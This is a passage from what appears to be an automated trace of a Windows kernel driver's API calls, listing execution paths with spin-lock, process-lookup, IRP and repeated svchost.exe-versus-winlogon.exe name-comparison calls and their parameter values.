| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80001074, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001074, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001074, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001074, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47fee |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003c63488c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003f9b4870 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003c84dcf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003f9b4870, MemoryDescriptorList_unk_out = 0xffffe0003f9b4870 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003c84dcf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c84dcf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003f9b4870 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002d562570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002d562528, Handle_out = 0xffffffff80001028, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001028, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80001028, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002d562520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80001028, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47fed |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a7b618c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003f9b4870 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002d562370, ret_val_unk_out = 0xffffe0003c84dcf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003f9b4870, MemoryDescriptorList_unk_out = 0xffffe0003f9b4870 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003c84dcf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c84dcf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003f9b4870 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c62d010, Irp_unk_out = 0xffffe0003c62d010, ret_val_out = 0x103 |
Execution Path #23 (length: 21, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 21 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #181 (length: 805, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 805 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
